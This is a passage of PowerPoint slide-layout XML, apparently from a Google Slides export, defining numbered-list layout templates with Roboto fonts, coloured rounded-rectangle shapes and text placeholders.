        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3199200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p2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91" name="Google Shape;191;p2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pic>
        <p:nvPicPr>
          <p:cNvPr id="192" name="Google Shape;192;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="504"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p2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4" name="Google Shape;194;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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95" name="Google Shape;195;p2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96" name="Google Shape;196;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4641650"/>
            <a:ext cx="9168600" cy="264900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1097275" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="10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97" name="Google Shape;197;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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5005">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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17. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 198"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p3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01" name="Google Shape;201;p3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02" name="Google Shape;202;p3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03" name="Google Shape;203;p3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04" name="Google Shape;204;p3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05" name="Google Shape;205;p3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06" name="Google Shape;206;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="Google Shape;207;p30"/>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08" name="Google Shape;208;p30"/>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30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="Google Shape;210;p30"/>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11" name="Google Shape;211;p30"/>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30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;p30"/>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14" name="Google Shape;214;p30"/>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30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Google Shape;216;p30"/>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17" name="Google Shape;217;p30"/>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8" name="Google Shape;218;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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19" name="Google Shape;219;p3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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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3" name="Google Shape;223;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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4" name="Google Shape;224;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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18. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 225"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p31"/>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28" name="Google Shape;228;p3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29" name="Google Shape;229;p3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30" name="Google Shape;230;p3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31" name="Google Shape;231;p3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32" name="Google Shape;232;p3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33" name="Google Shape;233;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Google Shape;234;p31"/>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235" name="Google Shape;235;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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6" name="Google Shape;236;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="237" name="Google Shape;237;p31"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="240" name="Google Shape;240;p31"/>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41" name="Google Shape;241;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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 name="Google Shape;242;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="243" name="Google Shape;243;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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44" name="Google Shape;244;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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5" name="Google Shape;245;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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46" name="Google Shape;246;p31"/>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1"/>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1"/>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1"/>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0" name="Google Shape;250;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="26952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51" name="Google Shape;251;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385563"/>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52" name="Google Shape;252;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Google Shape;253;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F5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54" name="Google Shape;254;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="134F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5" name="Google Shape;255;p31"/>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1"/>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19. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 257"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p32"/>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0" name="Google Shape;260;p3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61" name="Google Shape;261;p3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62" name="Google Shape;262;p3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263" name="Google Shape;263;p3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264" name="Google Shape;264;p3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265" name="Google Shape;265;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="266" name="Google Shape;266;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267" name="Google Shape;267;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8" name="Google Shape;268;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150"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69" name="Google Shape;269;p32"/>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0" name="Google Shape;270;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="271" name="Google Shape;271;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272" name="Google Shape;272;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3" name="Google Shape;273;p32"/>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4" name="Google Shape;274;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;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276" name="Google Shape;276;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 name="Google Shape;277;p32"/>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8" name="Google Shape;278;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="279" name="Google Shape;279;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280" name="Google Shape;280;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1" name="Google Shape;281;p32"/>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2" name="Google Shape;282;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="283" name="Google Shape;283;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284" name="Google Shape;284;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5" name="Google Shape;285;p32"/>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6" name="Google Shape;286;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="Google Shape;287;p32"/>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288" name="Google Shape;288;p32"/>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9" name="Google Shape;289;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="18488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0" name="Google Shape;290;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="24399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1" name="Google Shape;291;p32"/>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2" name="Google Shape;292;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088"/>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3" name="Google Shape;293;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="42361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20. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 294"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="123782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297" name="Google Shape;297;p3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298" name="Google Shape;298;p3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299" name="Google Shape;299;p3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00" name="Google Shape;300;p3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01" name="Google Shape;301;p3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02" name="Google Shape;302;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="303" name="Google Shape;303;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01</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="304" name="Google Shape;304;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5" name="Google Shape;305;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="127465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06" name="Google Shape;306;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="182890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07" name="Google Shape;307;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="308" name="Google Shape;308;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309" name="Google Shape;309;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 name="Google Shape;310;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2419975"/>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1" name="Google Shape;311;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="312" name="Google Shape;312;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313" name="Google Shape;313;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 name="Google Shape;314;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3011050"/>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 name="Google Shape;315;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="316" name="Google Shape;316;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFC0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317" name="Google Shape;317;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFC0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8" name="Google Shape;318;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3602138"/>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9" name="Google Shape;319;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="4863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05</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
